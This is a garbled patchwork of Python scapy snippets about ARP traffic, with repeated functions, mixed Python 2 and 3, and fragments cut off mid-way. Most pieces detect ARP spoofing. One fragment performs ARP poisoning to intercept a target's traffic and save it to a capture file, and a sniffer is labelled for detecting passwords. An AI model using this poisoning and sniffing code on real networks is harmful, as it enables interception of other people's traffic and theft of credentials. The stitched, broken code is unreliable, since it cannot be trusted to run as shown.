def main():
args_parser()
try:
#No store of the packet but analyzing on fly
sniff(iface=INTERFACE, store=False, prn=analyse_pkt)
except KeyboardInterrupt:
print('', end='\n\n')
def main():
args_parser()
#Detection of passwords
cprint(LINE + '\n Detection of passwords \n' + LINE,
'red',
attrs=[
'bold',
])
try:
#No store of the packet but analyzing on fly
sniff(iface=INTERFACE, store=False, prn=analyze_pkt)
except KeyboardInterrupt:
cprint(LINE, 'red', attrs=[
'bold',
], end='\n\n')
from scapy.layers.l2 import ARP, Ether, sniff
DB = {}
def scarpwatch_callback(pkt):
if ARP in pkt:
ip, mac = pkt[ARP].psrc, pkt[ARP].hwsrc
if ip in DB:
if mac != DB[ip]:
if Ether in pkt:
target = pkt[Ether].dst
else:
target = "%s?" % pkt[ARP].pdst
return "poisoning attack: target=%s victim=%s attacker=%s" % (
target, ip, mac)
else:
DB[ip] = mac
return "Oh !!!! gathering info from router %s=%s" % (mac, ip)
sniff(store=0, prn=scarpwatch_callback)
if ARP in pkt:
ip, mac = pkt[ARP].psrc, pkt[ARP].hwsrc
if ip in db:
if mac != db[ip]:
if Ether in pkt:
target = pkt[Ether].dst
else:
target = "%s?" % pkt[ARP].pdst
return "[!]:Worning! :>> Poisoning Attack: Target: {} | Victem: {} | Attacker: {} ".format(
target, ip, mac)
else:
db[ip] = mac
return "[!]Warning :>> SomeOne Is Trying To Gathering info from Router: | {} | {} ".format(
mac, ip)
# Start Checking ... :)
print("\n[#] Checking NetWork Start [#]\n")
sniff(store=0, prn=security)
#Done! :)
##############################################################
##################### #########################
##################### END OF SCRIPT #########################
##################### #########################
##############################################################
#This SCRIPT by Oseid Aldary
#Have a nice day :)
#GoodBye
# sys.exit(0)
#else:
# print "Gateway MAC Address is %s" % gateway_mac
print "Target ip is %s" % target_ip
target_mac = get_mac(target_ip)
#target_mac = sr(ARP(op=ARP.who_has, psrc="192.168.1.12", pdst=target_ip))
if target_mac is None:
print "<!> Failed to get Target MAC Address"
sys.exit(0)
else:
print "Target MAC Address is %s" % target_mac
#Start poisoning
poison_thread = threading.Thread(target=poison_target,
args=(gateway_ip, gateway_mac, target_ip,
target_mac))
poison_thread.start()
#Sniff connection
try:
print "Starting sniffer for %d packets" % packet_count
bpf_filter = "ip host %s" % target_ip
packets = sniff(count=packet_count, filter=bpf_filter, iface=interface)
wrpcap('arper.pcap', packets)
restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
except KeyboardInterrupt:
restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
sys.exit(0)
logFormatter = logging.Formatter(
"%(asctime)s [%(threadName)-12.12s] [%(levelname)-5.5s] %(message)s")
fileHandler = logging.FileHandler("{0}.log".format('access'))
fileHandler.setFormatter(logFormatter)
logger.addHandler(fileHandler)
def arp_monitor_callback(pkt):
if ARP in pkt and pkt[ARP].op == ARP.who_has:
mac_address = pkt[ARP].hwsrc
if mac_address not in known_devices.keys():
return pkt.sprintf("%ARP.hwsrc% %ARP.psrc% %ARP.op% {}".format(
known_devices.get(mac_address, "Unknown")))
elif mac_address in master_devices.keys():
logger.info("Master device was detected {}".format(
master_devices.get(mac_address)))
# return pkt.sprintf("Master device was detected {}".format(master_devices.get(mac_address)))
if __name__ == "__main__":
configure_logger()
with open(os.path.join('conf', 'known-devices.json'), 'r') as conf:
data = conf.read()
known_devices = json.loads(data)
with open(os.path.join('conf', 'master-devices.json'), 'r') as conf:
data = conf.read()
master_devices = json.loads(data)
sniff(prn=arp_monitor_callback, filter="arp", store=0)
def detect_spoofer(interface):
'''
Detect ARP spoofing
'''
sniff(iface=interface, store=False, prn=check_pkt)